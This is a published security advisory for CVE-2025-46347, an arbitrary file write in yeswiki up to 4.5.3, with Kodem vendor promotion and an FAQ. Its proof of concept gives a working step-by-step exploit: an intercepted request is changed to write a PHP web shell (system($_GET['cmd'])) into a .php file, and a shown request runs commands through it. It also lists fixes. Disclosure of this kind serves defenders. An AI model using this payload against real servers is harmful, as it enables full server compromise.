CVE-2025-46347

CVE-2025-46347 is a high-severity security vulnerability in yeswiki/yeswiki (composer), affecting versions <= 4.5.3. It is fixed in 4.5.4.

Summary

An arbitrary file write can be used to write a file with a PHP extension, which then can be browsed to in order to execute arbitrary code on the server.

All testing was performed on a local docker setup running the latest version of the application.

PoC

Proof of Concept

Navigate to http://localhost:8085/?LookWiki which allows you to click Create a new Graphical configuration where you specify some parameters and then click Save.

After clicking save, this request is made (most headers removed for clarity):

POST /?api/templates/custom-presets/test.css HTTP/1.1
Host: localhost:8085

primary-color=%230c5d6a&secondary-color-1=%23d8604c&secondary-color-2=%23d78958&neutral-color=%234e5056&neutral-soft-color=%2357575c&neutral-light-color=%23f2f2f2&main-text-fontsize=17px&main-text-fontfamily=%22Nunito%22%2C+sans-serif&main-title-fontfamily='Nunito'%2C+sans-serif

This request writes the file test.css to disk with the contents (abbreviated)

:root {
  --primary-color: #0c5d6a;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}

To exploit this, utilize a proxy tool to intercept the the first request and change the filename extension to .php and add arbitrary PHP code in for one of the request body parameters.

e.g. primary-color=%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B+%3F%3E

Now the file pizzapower.php is written to /var/www/html/custom/css-presets/pizzapower.php and it starts with this, where the PHP code is present.

:root {
  --primary-color: <?php system($_GET['cmd']); ?>;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}

Then, simply visit the file with a cmd parameter included.

http://localhost:8085/custom/css-presets/pizzapower.php?cmd=id

And the HTTP response will contain the output of our command. Notably this request can be performed unauthenticated (the creation of the file requires auth, though).

:root {
  --primary-color: uid=501(yeswiki) gid=501 groups=501
;
  --secondary-color-1: #d8604c;
  --secondary-color-2: #d78958;
  --neutral-color: #4e5056;
  --neutral-soft-color: #57575c;
  --neutral-light-color: #f2f2f2;
  --main-text-fontsize: 17px;
  --main-text-fontfamily: "Nunito", sans-serif;
  --main-title-fontfamily: 'Nunito', sans-serif;
}

Fixes

Amongst others:

Restrict file extensions: Only allow a safelist of extensions (e.g., .css) when saving files via this feature.
Harden server config: Disable PHP execution in user-writable directories

Impact

Full compromise of the server. Can potentially be performed unwittingly by a user subjected to the previously reported (or future) XSS vulnerabilities.

Affected versions

yeswiki/yeswiki (<= 4.5.3)

Security releases

yeswiki/yeswiki → 4.5.4 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade yeswiki/yeswiki to 4.5.4 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2025-46347? CVE-2025-46347 is a high-severity security vulnerability in yeswiki/yeswiki (composer), affecting versions <= 4.5.3. It is fixed in 4.5.4.
  2. Which versions of yeswiki/yeswiki are affected by CVE-2025-46347? yeswiki/yeswiki (composer) versions <= 4.5.3 is affected.
  3. Is there a fix for CVE-2025-46347? Yes. CVE-2025-46347 is fixed in 4.5.4. Upgrade to this version or later.
  4. Is CVE-2025-46347 exploitable, and should I be worried? Whether CVE-2025-46347 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2025-46347 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2025-46347? Upgrade yeswiki/yeswiki to 4.5.4 or later.

Other vulnerabilities in yeswiki/yeswiki

CVE-2026-41143CVE-2026-34598CVE-2025-52277CVE-2025-46346CVE-2025-46347

Stop the waste.
Protect your environment with Kodem.